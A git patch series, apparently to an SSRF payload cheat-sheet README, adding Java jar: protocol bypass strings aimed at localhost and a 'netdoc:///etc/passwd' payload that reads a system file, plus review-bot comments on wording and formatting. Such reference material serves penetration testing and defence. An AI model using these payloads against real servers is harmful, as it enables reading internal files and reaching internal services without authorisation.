From 08bc3acb053846aacf837965c2b3574ff9c97752 Mon Sep 17 00:00:00 2001 From: security-is-myth Date: Sat, 7 Nov 2020 22:03:02 +0530 Subject: [PATCH 1/3] update SSRF/README.md with java payloads --- Server Side Request Forgery/README.md | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index f96314c..c7613ab 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -247,6 +247,15 @@ For example to rotate between 1.2.3.4 and 169.254-169.254, use the following dom make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms ``` +### Bypassing using jar protocol (java only) + +```powershell +jar:scheme://domain/path!/ +jar:http://127.0.0.1!/ +jar:https://127.0.0.1!/ +jar:ftp://127.0.0.1!/ +``` + ## SSRF exploitation via URL Scheme ### File @@ -374,8 +383,8 @@ Content of evil.com/redirect.php: Wrapper for Java when your payloads struggle with "\n" and "\r" characters. ```powershell -ssrf.php?url=gopher://127.0.0.1:4242/DATA -``` +ssrf.php?url=netdoc:///etc/passwd +``` ## SSRF exploiting WSGI From f3066722ee82c21f2b9d40e365f1118a747940d2 Mon Sep 17 00:00:00 2001 From: security-is-myth Date: Sat, 7 Nov 2020 22:07:18 +0530 Subject: [PATCH 2/3] update SSRF/README.md with java payloads --- Server Side Request Forgery/README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index c7613ab..152b5fb 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md 
@@ -21,6 +21,7 @@ * [Bypass using enclosed alphanumerics](#bypass-using-enclosed-alphanumerics) * [Bypass filter_var() php function](#bypass-filter_var-php-function) * [Bypass against a weak parser](#bypass-against-a-weak-parser) + * [Bypassing using jar protocol (java only)](#bypassing-using-jar-protocol-java-only) * [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme) * [file://](#file) * [http://](#http) @@ -249,6 +250,8 @@ make-1.2.3.4-rebind-169.254-169.254-rr.1u.ms ### Bypassing using jar protocol (java only) +Blind SSRF + ```powershell jar:scheme://domain/path!/ jar:http://127.0.0.1!/ From bde7fc738c31fe06eb19b03819929af02007965a Mon Sep 17 00:00:00 2001 From: PwnL0rd Date: Sun, 8 Nov 2020 12:00:35 +0530 Subject: [PATCH 3/3] added link in the reference section --- Server Side Request Forgery/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 152b5fb..ac11920 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -781,3 +781,4 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet) - [SSRF’s up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019](https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/) - [challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!](https://www.kieranclaessens.be/cscbe-web-2018.html) +- [Attacking Url's in JAVA](https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/)
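Review bot: the new "Bypassing using jar protocol (java only)" section in the first hunk of PATCH 1/3 is a heading and a code block with no explanatory text: it does not say what the jar: handler does with the URL that precedes the `!/` separator, what filter or check the heading claims it bypasses, or that the first line `jar:scheme://domain/path!/` is a template rather than a working value. Add one or two sentences and mark that first line as a placeholder. The fence tag is also wrong for the content (these are URL strings, not PowerShell); the existing file uses ```powershell for the same kind of block elsewhere (see the -374 hunk), so either keep that convention deliberately or fix both in one pass. Consider placing the section under "## SSRF exploitation via URL Scheme" as well, since jar: is a URL scheme rather than a parser or filter bypass.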
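Review bot: the second hunk of PATCH 1/3 replaces the gopher example beneath "Wrapper for Java when your payloads struggle with "\n" and "\r" characters." with `netdoc:///etc/passwd`, so the example no longer illustrates the sentence above it (the gopher line is what carried those control characters; netdoc reads a local file and has nothing to do with them). Keep the original `ssrf.php?url=gopher://127.0.0.1:4242/DATA` line and add netdoc as its own entry with a sentence saying what it is, or move it next to the new jar section. The closing ``` fence also shows up as a removed and re-added line with no visible difference, which normally means a trailing-whitespace or line-ending change; strip that so the diff contains only the intended edit.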
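Review bot: the table-of-contents hunk in PATCH 2/3 is correct as an anchor (`#bypassing-using-jar-protocol-java-only` matches the heading slug), but the neighbouring entries read "Bypass ..." while this one reads "Bypassing ..."; rename the heading and the entry together so the list stays uniform.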
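Review bot: the bare line `Blind SSRF` added in the second hunk of PATCH 2/3 tells the reader nothing: blind in what sense (no response content comes back to the requester?), and what that means for confirming the behaviour or detecting it on the server side. Turn it into a sentence that states the actual limitation, e.g. "The jar: handler gives a blind SSRF: ..." followed by the detail, rather than leaving a dangling label above the code block. This commit also reuses the subject line of PATCH 1/3 verbatim; a subject such as "note that jar: SSRF is blind" would make the history searchable.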
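Review bot: the new reference in PATCH 3/3 does not follow the list's format: the surrounding entries are `[Title - Author - date](url)`, whereas this one is `[Attacking Url's in JAVA](...)` with no author or date, and "Url's" should be "URLs". Rewrite it in the same shape, taking the author and post date from the linked page, so the reference list stays consistent.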